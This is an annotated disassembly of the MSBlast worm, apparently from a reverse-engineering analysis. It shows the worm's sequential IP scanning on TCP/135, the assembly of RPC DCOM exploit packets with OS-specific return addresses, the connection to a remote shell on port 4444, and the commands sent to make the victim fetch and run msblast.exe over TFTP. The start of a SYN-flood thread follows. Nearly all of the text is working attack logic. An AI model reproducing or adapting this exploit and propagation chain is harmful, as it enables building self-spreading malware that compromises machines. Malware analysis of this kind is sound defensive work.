.text:0040170C incrementOctets proc near ; CODE XREF: incrementOctets+68vj
.text:0040170C ; infect20Hosts+6Fvp
.text:0040170C cmp ds:octet4, 0FEh
.text:00401716 jle short loc_401727 ; increment 4th octet and stop if in range [0-254]
.text:00401718 and ds:octet4, 0 ; 4th octet rolls over to 0; increment 3rd octet
.text:0040171F inc ds:octet3
.text:00401725 jmp short loc_40172F ; stop if octet3 is now in range [0-254]
.text:00401727 ; ---------------------------------------------------------------------------
.text:00401727
.text:00401727 loc_401727: ; CODE XREF: incrementOctets+A^j
.text:00401727 inc ds:octet4 ; increment 4th octet and stop if in range [0-254]
.text:0040172D jmp short locret_401776 ; return
.text:0040172F ; ---------------------------------------------------------------------------
.text:0040172F
.text:0040172F loc_40172F: ; CODE XREF: incrementOctets+19^j
.text:0040172F cmp ds:octet3, 0FEh ; stop if octet3 is now in range [0-254]
.text:00401739 jle short locret_401776 ; return
.text:0040173B and ds:octet3, 0 ; 3rd octet rolls over to 0; increment 2nd octet
.text:00401742 inc ds:octet2
.text:00401748 cmp ds:octet2, 0FEh ; stop if octet2 is now in range [0-254]
.text:00401752 jle short locret_401776 ; return
.text:00401754 and ds:octet2, 0 ; 2nd octet rolls over to 0; increment 1st octet
.text:0040175B inc ds:octet1
.text:00401761 cmp ds:octet1, 0FEh ; keep 1st octet if now in range [0-254];
.text:0040176B jle short loc_401774 ; increment 4th octet again so addr is never x.0.0.0
.text:0040176D and ds:octet1, 0 ; otherwise, 1st octet rolls over to 0
.text:00401774
.text:00401774 loc_401774: ; CODE XREF: incrementOctets+5F^j
.text:00401774 jmp short incrementOctets ; increment 4th octet again so addr is never x.0.0.0
.text:00401776 ; ---------------------------------------------------------------------------
.text:00401776
.text:00401776 locret_401776: ; CODE XREF: incrementOctets+21^j
.text:00401776 ; incrementOctets+2D^j ...
.text:00401776 retn ; return
.text:00401776 incrementOctets endp
.text:00401776
.text:00401777
.text:00401777 ; =============== S U B R O U T I N E =======================================
.text:00401777
.text:00401777 ; Attributes: bp-based frame
.text:00401777
.text:00401777 infect20Hosts proc near ; CODE XREF: WinMain+312^p
.text:00401777
.text:00401777 var_18C = dword ptr -18Ch
.text:00401777 writefds = fd_set ptr -188h
.text:00401777 var_84 = byte ptr -84h
.text:00401777 in = in_addr ptr -80h
.text:00401777 namelen = dword ptr -74h
.text:00401777 argp = dword ptr -70h
.text:00401777 name = sockaddr ptr -6Ch
.text:00401777 timeout = timeval ptr -5Ch
.text:00401777 var_54 = dword ptr -54h
.text:00401777 s = dword ptr -50h
.text:00401777
.text:00401777 push ebp
.text:00401778 mov ebp, esp
.text:0040177A sub esp, 18Ch
.text:00401780 push ebx
.text:00401781 push esi
.text:00401782 push edi
.text:00401783 mov [ebp+argp], 1 ; set argp for ioctlsocket() to 1 (on)
.text:0040178A push 10h
.text:0040178C push 0
.text:0040178E lea eax, [ebp+name]
.text:00401791 push eax
.text:00401792 call memset
.text:00401797 add esp, 0Ch
.text:0040179A mov [ebp+name.sa_family], 2 ; AF_INET
.text:004017A0 push 87h ; hostshort = port TCP/135
.text:004017A5 call htons
.text:004017AA mov esi, eax
.text:004017AC mov word ptr [ebp+name.sa_data], si
.text:004017B0 xor edi, edi
.text:004017B2
.text:004017B2 Create 20 non-blocking TCP/IP sockets
.text:004017B2
.text:004017B2 loc_4017B2: ; CODE XREF: infect20Hosts+6Bvj
.text:004017B2 push 0 ; protocol = IPPROTO_IP
.text:004017B4 push 1 ; type = SOCK_STREAM
.text:004017B6 push 2 ; af = AF_INET
.text:004017B8 call socket
.text:004017BD mov [ebp+edi*4+s], eax
.text:004017C1 cmp [ebp+edi*4+s], 0FFFFFFFFh
.text:004017C6 jz loc_401924 ; return
.text:004017CC lea eax, [ebp+argp]
.text:004017CF push eax ; argp = 1 (on)
.text:004017D0 push 8004667Eh ; cmd = FIONBIO
.text:004017D5 push [ebp+edi*4+s] ; s[EDI]
.text:004017D9 call ioctlsocket
.text:004017DE inc edi
.text:004017DF cmp edi, 14h
.text:004017E2 jl short loc_4017B2 ; loop 20 times
.text:004017E4 xor edi, edi
.text:004017E6
.text:004017E6 Try to connect sockets to port TCP/135 on 20 sequential IP addresses
.text:004017E6
.text:004017E6 loc_4017E6: ; CODE XREF: infect20Hosts+CDvj
.text:004017E6 call incrementOctets ; connect loop -- executed 20 times
.text:004017EB push ds:octet4
.text:004017F1 push ds:octet3
.text:004017F7 push ds:octet2
.text:004017FD push ds:octet1
.text:00401803 push offset aI_I_I_I ; "%i.%i.%i.%i"
.text:00401808 push offset cp
.text:0040180D call sprintf ; convert four octets into a string
.text:00401812 add esp, 18h
.text:00401815 push offset cp ; cp
.text:0040181A call inet_addr ; now convert string into DWORD
.text:0040181F mov [ebp+var_54], eax
.text:00401822 cmp eax, 0FFFFFFFFh
.text:00401825 jz loc_401924 ; return
.text:0040182B mov eax, [ebp+var_54]
.text:0040182E mov dword ptr [ebp+name.sa_data+2], eax
.text:00401831 push 10h ; namelen
.text:00401833 lea eax, [ebp+name]
.text:00401836 push eax ; name
.text:00401837 push [ebp+edi*4+s] ; s[EDI]
.text:0040183B call connect
.text:00401840 inc edi
.text:00401841 cmp edi, 14h
.text:00401844 jl short loc_4017E6 ; connect loop -- executed 20 times
.text:00401846 push 708h ; dwMilliseconds
.text:0040184B call Sleep ; wait 1.8 seconds
.text:00401850 xor edi, edi
.text:00401852
.text:00401852 Look for connected sockets by doing a select() on each s[EDI] (EDI=0..19)
.text:00401852
.text:00401852 loc_401852: ; CODE XREF: infect20Hosts+1A7vj
.text:00401852 and [ebp+timeout.tv_sec], 0
.text:00401856 and [ebp+timeout.tv_usec], 0 ; zero out timeval struct
.text:00401856 ; (timeout of 0 = return instantly)
.text:0040185A and [ebp+writefds.fd_count], 0 ; FD_ZERO(&writefds)
.text:00401861
.text:00401861 --- start of FD_SET macro code
.text:00401861
.text:00401861 and [ebp+var_18C], 0 ; FD_SET(s[EDI], &writefds)
.text:00401868 jmp short loc_401883
.text:0040186A ; ---------------------------------------------------------------------------
.text:0040186A
.text:0040186A loc_40186A: ; CODE XREF: infect20Hosts+118vj
.text:0040186A mov esi, [ebp+var_18C]
.text:00401870 mov ebx, [ebp+edi*4+s] ; EDI = index into s[] socket array
.text:00401870 ; EBX = socket s[EDI]
.text:00401874 cmp [ebp+esi*4+writefds.fd_array], ebx
.text:0040187B jz short loc_401891
.text:0040187D inc [ebp+var_18C]
.text:00401883
.text:00401883 loc_401883: ; CODE XREF: infect20Hosts+F1^j
.text:00401883 mov eax, [ebp+writefds.fd_count]
.text:00401889 cmp [ebp+var_18C], eax
.text:0040188F jb short loc_40186A
.text:00401891
.text:00401891 loc_401891: ; CODE XREF: infect20Hosts+104^j
.text:00401891 mov eax, [ebp+writefds.fd_count]
.text:00401897 cmp [ebp+var_18C], eax
.text:0040189D jnz short loc_4018BB
.text:0040189F cmp eax, 40h
.text:004018A2 jnb short loc_4018BB
.text:004018A4 mov esi, [ebp+var_18C]
.text:004018AA mov ebx, [ebp+edi*4+s]
.text:004018AE mov [ebp+esi*4+writefds.fd_array], ebx
.text:004018B5 inc [ebp+writefds.fd_count]
.text:004018B5
.text:004018B5 --- end of FD_SET macro code
.text:004018BB
.text:004018BB loc_4018BB: ; CODE XREF: infect20Hosts+126^j
.text:004018BB ; infect20Hosts+12B^j
.text:004018BB lea eax, [ebp+timeout]
.text:004018BE push eax ; timeout
.text:004018BF push 0 ; exceptfds
.text:004018C1 lea eax, [ebp+writefds]
.text:004018C7 push eax ; writefds
.text:004018C8 push 0 ; readfds
.text:004018CA push 0 ; nfds
.text:004018CC call select ; writefds will be list of connected sockets
.text:004018D1 cmp eax, 1
.text:004018D4 jge short loc_4018E1 ; did select() succeed?
.text:004018D6 push [ebp+edi*4+s] ; s
.text:004018DA call closesocket ; close socket s[EDI] if select() failed
.text:004018DF jmp short loc_40191A ; advance to next iteration of loop
.text:004018E1 ; ---------------------------------------------------------------------------
.text:004018E1
.text:004018E1 loc_4018E1: ; CODE XREF: infect20Hosts+15D^j
.text:004018E1 mov [ebp+namelen], 10h
.text:004018E8 lea eax, [ebp+namelen]
.text:004018EB push eax ; namelen
.text:004018EC lea eax, [ebp+var_84]
.text:004018F2 push eax ; name
.text:004018F3 push [ebp+edi*4+s] ; s
.text:004018F7 call getpeername
.text:004018FC push dword ptr [ebp+in.S_un] ; in
.text:004018FF call inet_ntoa
.text:00401904 push eax ; szIPAddr: string representation of IP address to infect
.text:00401905 push [ebp+edi*4+s] ; s: socket connected to remote TCP/135
.text:00401909 call infectTarget ; infect a single host by sending command
.text:00401909 ; shell exploit and issuing command to
.text:00401909 ; download worm executable via TFTP
.text:0040190E add esp, 8
.text:00401911 push [ebp+edi*4+s] ; s
.text:00401915 call closesocket ; close TCP/135 socket
.text:0040191A
.text:0040191A loc_40191A: ; CODE XREF: infect20Hosts+168^j
.text:0040191A inc edi
.text:0040191B cmp edi, 14h
.text:0040191E jl loc_401852 ; check each of the 20 sockets in array for connection
.text:00401924
.text:00401924 loc_401924: ; CODE XREF: infect20Hosts+4F^j
.text:00401924 ; infect20Hosts+AE^j
.text:00401924 pop edi ; return
.text:00401925 pop esi
.text:00401926 pop ebx
.text:00401927 leave
.text:00401928 retn
.text:00401928 infect20Hosts endp
.text:00401928
.text:00401929
.text:00401929 ; =============== S U B R O U T I N E =======================================
.text:00401929
.text:00401929 ; Attributes: bp-based frame
.text:00401929
.text:00401929 ; int __cdecl infectTarget(SOCKET s,char *szIPAddr)
.text:00401929 infectTarget proc near ; CODE XREF: infect20Hosts+192^p
.text:00401929
.text:00401929 ThreadId = dword ptr -1934h
.text:00401929 var_1930 = dword ptr -1930h
.text:00401929 namelen = dword ptr -192Ch
.text:00401929 var_1928 = byte ptr -1928h
.text:00401929 var_18F8 = byte ptr -18F8h
.text:00401929 var_18BC = byte ptr -18BCh
.text:00401929 buf = byte ptr -155Ch
.text:00401929 var_1514 = dword ptr -1514h
.text:00401929 argp = dword ptr -1510h
.text:00401929 var_150C = byte ptr -150Ch
.text:00401929 var_14E8 = byte ptr -14E8h
.text:00401929 hObject = dword ptr -1240h
.text:00401929 var_123C = dword ptr -123Ch
.text:00401929 name = sockaddr ptr -1238h
.text:00401929 var_1228 = byte ptr -1228h
.text:00401929 var_1224 = byte ptr -1224h
.text:00401929 var_1223 = byte ptr -1223h
.text:00401929 var_1222 = byte ptr -1222h
.text:00401929 var_1221 = byte ptr -1221h
.text:00401929 var_1218 = dword ptr -1218h
.text:00401929 var_1210 = dword ptr -1210h
.text:00401929 var_1208 = dword ptr -1208h
.text:00401929 var_1204 = byte ptr -1204h
.text:00401929 len = dword ptr -1004h
.text:00401929 var_1000 = byte ptr -1000h
.text:00401929 var_FF8 = dword ptr -0FF8h
.text:00401929 var_FF0 = dword ptr -0FF0h
.text:00401929 var_F80 = dword ptr -0F80h
.text:00401929 var_F7C = dword ptr -0F7Ch
.text:00401929 var_F4C = dword ptr -0F4Ch
.text:00401929 var_F48 = dword ptr -0F48h
.text:00401929 var_F30 = dword ptr -0F30h
.text:00401929 var_E74 = dword ptr -0E74h
.text:00401929 s = dword ptr 8
.text:00401929 szIPAddr = dword ptr 0Ch
.text:00401929
.text:00401929 push ebp ; flags
.text:0040192A mov ebp, esp
.text:0040192C mov eax, 2934h
.text:00401931 call allocstackspace ; used when > 4KB stack space needed
.text:00401936 push ebx ; len
.text:00401937 push esi ; buf
.text:00401938 push edi ; s
.text:00401939 and [ebp+argp], 0 ; set argp for ioctlsocket() to 0 (off)
.text:00401940 lea eax, [ebp+argp]
.text:00401946 push eax ; argp = 0 (off)
.text:00401947 push 8004667Eh ; cmd = FIONBIO
.text:0040194C push [ebp+s] ; s
.text:0040194F call ioctlsocket ; make sure socket does blocking I/O
.text:00401954 cmp ds:dwWhichRetAddr, 1 ; 80% chance set to 1 (XP), 20% set to 2 (2000)
.text:0040195B jnz short loc_401969 ; 2000 "universal" return address (20% probability)
.text:0040195B ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:0040195D
.text:0040195D Assemble RPC DCOM exploit packets
.text:0040195D
.text:0040195D mov [ebp+var_1514], 100139Dh ; XP "universal" return address (80% probability)
.text:0040195D ; 0100139Dh is a "CALL EBX" in svchost.exe
.text:00401967 jmp short loc_401973
.text:00401969 ; ---------------------------------------------------------------------------
.text:00401969
.text:00401969 loc_401969: ; CODE XREF: infectTarget+32^j
.text:00401969 mov [ebp+var_1514], 18759Fh ; 2000 "universal" return address (20% probability)
.text:00401969 ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:00401973
.text:00401973 loc_401973: ; CODE XREF: infectTarget+3E^j
.text:00401973 lea edi, [ebp+buf]
.text:00401979 lea esi, ds:4040C0h ; bindstr[]
.text:0040197F mov ecx, 12h ; size = 0048h (72)
.text:00401984 rep movsd
.text:00401986 lea edi, [ebp+var_18BC]
.text:0040198C lea esi, ds:404108h ; request1[]
.text:00401992 mov ecx, 0D8h ; size = 0360h (864)
.text:00401997 rep movsd
.text:00401999 lea edi, [ebp+var_1218]
.text:0040199F lea esi, ds:404468h ; request2[]
.text:004019A5 mov ecx, 4 ; size = 0010h (16)
.text:004019AA rep movsd
.text:004019AC lea edi, [ebp+var_18F8]
.text:004019B2 lea esi, ds:404478h ; request3[]
.text:004019B8 mov ecx, 0Fh ; size = 003Ch (60)
.text:004019BD rep movsd
.text:004019BF lea edi, [ebp+var_150C]
.text:004019C5 lea esi, ds:4044B4h ; sc
.text:004019CB mov ecx, 0B3h ; size = 02CCh (716)
.text:004019D0 rep movsd
.text:004019D2 lea edi, [ebp+var_1928]
.text:004019D8 lea esi, ds:404780h ; request4[]
.text:004019DE mov ecx, 0Ch ; size = 0030h (48)
.text:004019E3 rep movsd
.text:004019E5 push 4
.text:004019E7 lea eax, [ebp+var_1514]
.text:004019ED push eax
.text:004019EE lea eax, [ebp+var_14E8]
.text:004019F4 push eax
.text:004019F5 call memcpy
.text:004019FA mov [ebp+var_1930], 2CCh
.text:00401A04 push 360h
.text:00401A09 lea eax, [ebp+var_18BC]
.text:00401A0F push eax
.text:00401A10 lea eax, [ebp+var_1000]
.text:00401A16 push eax
.text:00401A17 call memcpy
.text:00401A1C mov [ebp+len], 360h
.text:00401A26 add [ebp+var_1218], 166h
.text:00401A30 mov eax, [ebp+var_1210]
.text:00401A36 add eax, 166h
.text:00401A3B mov [ebp+var_1210], eax
.text:00401A41 push 10h
.text:00401A43 lea eax, [ebp+var_1218]
.text:00401A49 push eax
.text:00401A4A lea eax, [ebp+var_1000]
.text:00401A50 add eax, 360h
.text:00401A55 push eax
.text:00401A56 call memcpy
.text:00401A5B mov [ebp+len], 370h
.text:00401A65 push 2CCh
.text:00401A6A lea eax, [ebp+var_150C]
.text:00401A70 push eax
.text:00401A71 lea eax, [ebp+var_1000]
.text:00401A77 add eax, 370h
.text:00401A7C push eax
.text:00401A7D call memcpy
.text:00401A82 mov [ebp+len], 63Ch
.text:00401A8C push 3Ch
.text:00401A8E lea eax, [ebp+var_18F8]
.text:00401A94 push eax
.text:00401A95 lea eax, [ebp+var_1000]
.text:00401A9B add eax, 63Ch
.text:00401AA0 push eax
.text:00401AA1 call memcpy
.text:00401AA6 mov [ebp+len], 678h
.text:00401AB0 push 30h
.text:00401AB2 lea eax, [ebp+var_1928]
.text:00401AB8 push eax
.text:00401AB9 lea eax, [ebp+var_1000]
.text:00401ABF add eax, 678h
.text:00401AC4 push eax
.text:00401AC5 call memcpy
.text:00401ACA add esp, 48h
.text:00401ACD mov [ebp+len], 6A8h
.text:00401AD7 mov eax, [ebp+var_FF8]
.text:00401ADD add eax, 2C0h
.text:00401AE2 mov [ebp+var_FF8], eax
.text:00401AE8 mov eax, [ebp+var_FF0]
.text:00401AEE add eax, 2C0h
.text:00401AF3 mov [ebp+var_FF0], eax
.text:00401AF9 mov eax, [ebp+var_F80]
.text:00401AFF add eax, 2C0h
.text:00401B04 mov [ebp+var_F80], eax
.text:00401B0A mov eax, [ebp+var_F7C]
.text:00401B10 add eax, 2C0h
.text:00401B15 mov [ebp+var_F7C], eax
.text:00401B1B mov eax, [ebp+var_F4C]
.text:00401B21 add eax, 2C0h
.text:00401B26 mov [ebp+var_F4C], eax
.text:00401B2C mov eax, [ebp+var_F48]
.text:00401B32 add eax, 2C0h
.text:00401B37 mov [ebp+var_F48], eax
.text:00401B3D mov eax, [ebp+var_F30]
.text:00401B43 add eax, 2C0h
.text:00401B48 mov [ebp+var_F30], eax
.text:00401B4E mov eax, [ebp+var_E74]
.text:00401B54 add eax, 2C0h
.text:00401B59 mov [ebp+var_E74], eax
.text:00401B5F push 0 ; flags
.text:00401B61 push 48h ; len
.text:00401B63 lea eax, [ebp+buf]
.text:00401B69 push eax ; buf
.text:00401B6A push [ebp+s] ; s
.text:00401B6D call send ; send RPC bind packet (bindstr[])
.text:00401B72 cmp eax, 0FFFFFFFFh
.text:00401B75 jz loc_401E3B ; return
.text:00401B7B push 0 ; flags
.text:00401B7D push [ebp+len] ; len
.text:00401B83 lea eax, [ebp+var_1000]
.text:00401B89 push eax ; buf
.text:00401B8A push [ebp+s] ; s
.text:00401B8D call send ; send assembled DCOM REMACT exploit packet
.text:00401B92 cmp eax, 0FFFFFFFFh
.text:00401B95 jz loc_401E3B ; return
.text:00401B9B push [ebp+s] ; s
.text:00401B9E call closesocket ; close TCP/135 socket
.text:00401BA3 push 190h ; dwMilliseconds
.text:00401BA8 call Sleep ; sleep for 0.4 seconds
.text:00401BAD
.text:00401BAD Connect to remote command shell
.text:00401BAD
.text:00401BAD push 0 ; protocol = IPPROTO_TCP
.text:00401BAF push 1 ; type = SOCK_STREAM
.text:00401BB1 push 2 ; af = AF_INET
.text:00401BB3 call socket ; create new TCP/IP socket for connecting to command shell
.text:00401BB8 mov [ebp+var_1208], eax
.text:00401BBE cmp eax, 0FFFFFFFFh
.text:00401BC1 jz loc_401E3B ; return
.text:00401BC7 push 10h
.text:00401BC9 push 0
.text:00401BCB lea eax, [ebp+name]
.text:00401BD1 push eax
.text:00401BD2 call memset
.text:00401BD7 add esp, 0Ch
.text:00401BDA mov [ebp+name.sa_family], 2
.text:00401BE3 push 115Ch ; hostshort = 4444
.text:00401BE8 call htons
.text:00401BED mov edi, eax
.text:00401BEF mov word ptr [ebp+name.sa_data], di
.text:00401BF6 push [ebp+szIPAddr] ; cp
.text:00401BF9 call inet_addr
.text:00401BFE mov [ebp+var_123C], eax
.text:00401C04 cmp eax, 0FFFFFFFFh
.text:00401C07 jz loc_401E3B ; return
.text:00401C0D mov eax, [ebp+var_123C]
.text:00401C13 mov dword ptr [ebp+name.sa_data+2], eax
.text:00401C19 push 10h ; namelen
.text:00401C1B lea eax, [ebp+name]
.text:00401C21 push eax ; name
.text:00401C22 push [ebp+var_1208] ; s
.text:00401C28 call connect ; attempt to connect to command shell on port TCP/4444
.text:00401C2D cmp eax, 0FFFFFFFFh
.text:00401C30 jz loc_401E3B ; return
.text:00401C36
.text:00401C36 Start TFTP server thread and send TFTP command
.text:00401C36
.text:00401C36 push 10h
.text:00401C38 push 0
.text:00401C3A push offset cp
.text:00401C3F call memset
.text:00401C44 mov [ebp+namelen], 10h
.text:00401C4E push 10h
.text:00401C50 push 0
.text:00401C52 lea eax, [ebp+var_1228]
.text:00401C58 push eax
.text:00401C59 call memset
.text:00401C5E lea eax, [ebp+namelen]
.text:00401C64 push eax ; namelen
.text:00401C65 lea eax, [ebp+var_1228]
.text:00401C6B push eax ; name
.text:00401C6C push [ebp+var_1208] ; s
.text:00401C72 call getsockname
.text:00401C77 movzx eax, [ebp+var_1221]
.text:00401C7E push eax
.text:00401C7F movzx eax, [ebp+var_1222]
.text:00401C86 push eax
.text:00401C87 movzx eax, [ebp+var_1223]
.text:00401C8E push eax
.text:00401C8F movzx eax, [ebp+var_1224]
.text:00401C96 push eax
.text:00401C97 push offset aD_D_D_D ; "%d.%d.%d.%d"
.text:00401C9C push offset cp
.text:00401CA1 call sprintf
.text:00401CA6 add esp, 30h
.text:00401CA9 cmp ds:s, 0
.text:00401CB0 jz short loc_401CBD
.text:00401CB2 push ds:s ; s
.text:00401CB8 call closesocket
.text:00401CBD
.text:00401CBD loc_401CBD: ; CODE XREF: infectTarget+387^j
.text:00401CBD lea eax, [ebp+ThreadId]
.text:00401CC3 push eax ; lpThreadId
.text:00401CC4 push 0 ; dwCreationFlags
.text:00401CC6 push 0 ; lpParameter
.text:00401CC8 push offset TFTPServerThread ; lpStartAddress
.text:00401CCD push 0 ; dwStackSize
.text:00401CCF push 0 ; lpThreadAttributes
.text:00401CD1 call CreateThread
.text:00401CD6 mov [ebp+hObject], eax
.text:00401CDC push 50h ; dwMilliseconds
.text:00401CDE call Sleep ; sleep for 80ms
.text:00401CE3 push offset aMsblast_exe ; "msblast.exe"
.text:00401CE8 push offset cp
.text:00401CED push offset aTftpISGetS ; "tftp -i %s GET %s\n"
.text:00401CF2 lea eax, [ebp+var_1204]
.text:00401CF8 push eax
.text:00401CF9 call sprintf ; create command string for downloading worm exe via TFTP
.text:00401CFE add esp, 10h
.text:00401D01 lea ecx, [ebp+var_1204]
.text:00401D07 or eax, 0FFFFFFFFh
.text:00401D0A
.text:00401D0A loc_401D0A: ; CODE XREF: infectTarget+3E6vj
.text:00401D0A inc eax
.text:00401D0B cmp byte ptr [ecx+eax], 0
.text:00401D0F jnz short loc_401D0A
.text:00401D11 push 0 ; flags
.text:00401D13 push eax ; len
.text:00401D14 lea eax, [ebp+var_1204]
.text:00401D1A push eax ; buf
.text:00401D1B push [ebp+var_1208] ; s
.text:00401D21 call send ; send "tftp -i <myipaddr> GET msblast.exe <enter>" command
.text:00401D26 cmp eax, 1
.text:00401D29 jl loc_401DEB
.text:00401D2F push 3E8h ; dwMilliseconds
.text:00401D34 call Sleep ; sleep for 1 second
.text:00401D39 xor ebx, ebx
.text:00401D3B jmp short loc_401D48
.text:00401D3D ; ---------------------------------------------------------------------------
.text:00401D3D
.text:00401D3D loc_401D3D: ; CODE XREF: infectTarget+42Bvj
.text:00401D3D push 7D0h ; dwMilliseconds
.text:00401D42 call Sleep ; sleep for 2 seconds
.text:00401D47 inc ebx
.text:00401D48
.text:00401D48 loc_401D48: ; CODE XREF: infectTarget+412^j
.text:00401D48 cmp ebx, 0Ah
.text:00401D4B jge short loc_401D56
.text:00401D4D cmp dwTFTPInProgress, 0 ; is TFTP transfer finished?
.text:00401D54 jnz short loc_401D3D ; loop up to 10 times waiting for TFTP server to finish
.text:00401D56
.text:00401D56 loc_401D56: ; CODE XREF: infectTarget+422^j
.text:00401D56 push offset aMsblast_exe ; "msblast.exe"
.text:00401D5B push offset aStartS ; "start %s\n"
.text:00401D60 lea eax, [ebp+var_1204]
.text:00401D66 push eax
.text:00401D67 call sprintf ; create command string
.text:00401D6C add esp, 0Ch
.text:00401D6F lea ecx, [ebp+var_1204]
.text:00401D75 or eax, 0FFFFFFFFh
.text:00401D78
.text:00401D78 loc_401D78: ; CODE XREF: infectTarget+454vj
.text:00401D78 inc eax
.text:00401D79 cmp byte ptr [ecx+eax], 0
.text:00401D7D jnz short loc_401D78
.text:00401D7F push 0 ; flags
.text:00401D81 push eax ; len
.text:00401D82 lea eax, [ebp+var_1204]
.text:00401D88 push eax ; buf
.text:00401D89 push [ebp+var_1208] ; s
.text:00401D8F call send ; send "start msblast.exe <enter>" command
.text:00401D94 cmp eax, 1
.text:00401D97 jl short loc_401DEB
.text:00401D99 push 7D0h ; dwMilliseconds
.text:00401D9E call Sleep ; sleep two seconds
.text:00401DA3 push offset aMsblast_exe ; "msblast.exe"
.text:00401DA8 push offset aS_0 ; "%s\n"
.text:00401DAD lea eax, [ebp+var_1204]
.text:00401DB3 push eax
.text:00401DB4 call sprintf ; create command string
.text:00401DB9 add esp, 0Ch
.text:00401DBC lea ecx, [ebp+var_1204]
.text:00401DC2 or eax, 0FFFFFFFFh
.text:00401DC5
.text:00401DC5 loc_401DC5: ; CODE XREF: infectTarget+4A1vj
.text:00401DC5 inc eax
.text:00401DC6 cmp byte ptr [ecx+eax], 0
.text:00401DCA jnz short loc_401DC5
.text:00401DCC push 0 ; flags
.text:00401DCE push eax ; len
.text:00401DCF lea eax, [ebp+var_1204]
.text:00401DD5 push eax ; buf
.text:00401DD6 push [ebp+var_1208] ; s
.text:00401DDC call send ; now send "msblast.exe <enter>" command
.text:00401DE1 push 7D0h ; dwMilliseconds
.text:00401DE6 call Sleep ; sleep for 2 seconds
.text:00401DEB
.text:00401DEB loc_401DEB: ; CODE XREF: infectTarget+400^j
.text:00401DEB ; infectTarget+46E^j
.text:00401DEB cmp [ebp+var_1208], 0
.text:00401DF2 jz short loc_401DFF
.text:00401DF4 push [ebp+var_1208] ; s
.text:00401DFA call closesocket
.text:00401DFF
.text:00401DFF loc_401DFF: ; CODE XREF: infectTarget+4C9^j
.text:00401DFF cmp dwTFTPInProgress, 0
.text:00401E06 jz short loc_401E27
.text:00401E08 push 0 ; dwExitCode
.text:00401E0A push [ebp+hObject] ; hThread
.text:00401E10 call TerminateThread ; kill TFTP server thread if it's not done already
.text:00401E15 push ds:s ; s
.text:00401E1B call closesocket
.text:00401E20 and dwTFTPInProgress, 0
.text:00401E27
.text:00401E27 loc_401E27: ; CODE XREF: infectTarget+4DD^j
.text:00401E27 cmp [ebp+hObject], 0
.text:00401E2E jz short loc_401E3B ; return
.text:00401E30 push [ebp+hObject] ; hObject
.text:00401E36 call CloseHandle ; close handle to TFTP server thread
.text:00401E3B
.text:00401E3B loc_401E3B: ; CODE XREF: infectTarget+24C^j
.text:00401E3B ; infectTarget+26C^j ...
.text:00401E3B pop edi ; return
.text:00401E3C pop esi
.text:00401E3D pop ebx
.text:00401E3E leave
.text:00401E3F retn
.text:00401E3F infectTarget endp
.text:00401E3F
.text:00401E40
.text:00401E40 ; =============== S U B R O U T I N E =======================================
.text:00401E40
.text:00401E40
.text:00401E40 computeChecksum proc near ; CODE XREF: sendTCP80SYN+1AEvp
.text:00401E40 ; sendTCP80SYN+1EAvp
.text:00401E40
.text:00401E40 lpData = dword ptr 8
.text:00401E40 dwLength = dword ptr 0Ch
.text:00401E40
.text:00401E40 push ebx
.text:00401E41 mov ebx, [esp+lpData]
.text:00401E45 mov ecx, [esp+dwLength]
.text:00401E49 xor edx, edx
.text:00401E4B jmp short loc_401E5A
.text:00401E4D ; ---------------------------------------------------------------------------
.text:00401E4D
.text:00401E4D loc_401E4D: ; CODE XREF: computeChecksum+1Dvj
.text:00401E4D mov eax, ebx
.text:00401E4F add ebx, 2
.text:00401E52 movzx eax, word ptr [eax]
.text:00401E55 add edx, eax
.text:00401E57 sub ecx, 2
.text:00401E5A
.text:00401E5A loc_401E5A: ; CODE XREF: computeChecksum+B^j
.text:00401E5A cmp ecx, 1
.text:00401E5D jg short loc_401E4D
.text:00401E5F or ecx, ecx
.text:00401E61 jz short loc_401E68
.text:00401E63 movzx eax, byte ptr [ebx]
.text:00401E66 add edx, eax
.text:00401E68
.text:00401E68 loc_401E68: ; CODE XREF: computeChecksum+21^j
.text:00401E68 mov ecx, edx
.text:00401E6A shr ecx, 10h
.text:00401E6D mov ebx, edx
.text:00401E6F and ebx, 0FFFFh
.text:00401E75 mov edx, ecx
.text:00401E77 add edx, ebx
.text:00401E79 mov ecx, edx
.text:00401E7B shr ecx, 10h
.text:00401E7E add edx, ecx
.text:00401E80 mov eax, edx
.text:00401E82 not eax
.text:00401E84 and eax, 0FFFFh
.text:00401E89 pop ebx
.text:00401E8A retn
.text:00401E8A computeChecksum endp
.text:00401E8A
.text:00401E8B
.text:00401E8B ; =============== S U B R O U T I N E =======================================
.text:00401E8B
.text:00401E8B ; Attributes: bp-based frame
.text:00401E8B
.text:00401E8B ; int __cdecl lookupIPAddr(char *name)
.text:00401E8B lookupIPAddr proc near ; CODE XREF: WUSYNFloodThread+13vp
.text:00401E8B ; sendTCP80SYN+7Evp
.text:00401E8B
.text:00401E8B name = dword ptr 8
.text:00401E8B
.text:00401E8B push ebp
.text:00401E8C mov ebp, esp
.text:00401E8E push esi
.text:00401E8F push edi
.text:00401E90 push [ebp+name] ; cp
.text:00401E93 call inet_addr
.text:00401E98 mov edi, eax
.text:00401E9A xor esi, esi
.text:00401E9C cmp edi, 0FFFFFFFFh
.text:00401E9F jnz short loc_401EBB
.text:00401EA1 push [ebp+name] ; name
.text:00401EA4 call gethostbyname
.text:00401EA9 mov esi, eax
.text:00401EAB or esi, esi
.text:00401EAD jnz short loc_401EB4
.text:00401EAF or eax, 0FFFFFFFFh
.text:00401EB2 jmp short loc_401EBD
.text:00401EB4 ; ---------------------------------------------------------------------------
.text:00401EB4
.text:00401EB4 loc_401EB4: ; CODE XREF: lookupIPAddr+22^j
.text:00401EB4 mov eax, [esi+0Ch]
.text:00401EB7 mov eax, [eax]
.text:00401EB9 mov edi, [eax]
.text:00401EBB
.text:00401EBB loc_401EBB: ; CODE XREF: lookupIPAddr+14^j
.text:00401EBB mov eax, edi
.text:00401EBD
.text:00401EBD loc_401EBD: ; CODE XREF: lookupIPAddr+27^j
.text:00401EBD pop edi
.text:00401EBE pop esi
.text:00401EBF pop ebp
.text:00401EC0 retn
.text:00401EC0 lookupIPAddr endp
.text:00401EC0
.text:00401EC1
.text:00401EC1 ; =============== S U B R O U T I N E =======================================
.text:00401EC1
.text:00401EC1 ; Attributes: bp-based frame
.text:00401EC1
.text:00401EC1 ; DWORD __stdcall WUSYNFloodThread(LPVOID)
.text:00401EC1 WUSYNFloodThread proc near ; DATA XREF: WinMain+304^o
.text:00401EC1
.text:00401EC1 optval = byte ptr -4
.text:00401EC1
.text:00401EC1 push ebp
.text:00401EC2 mov ebp, esp
.text:00401EC4 push ecx
.text:00401EC5 push ebx
.text:00401EC6 push esi
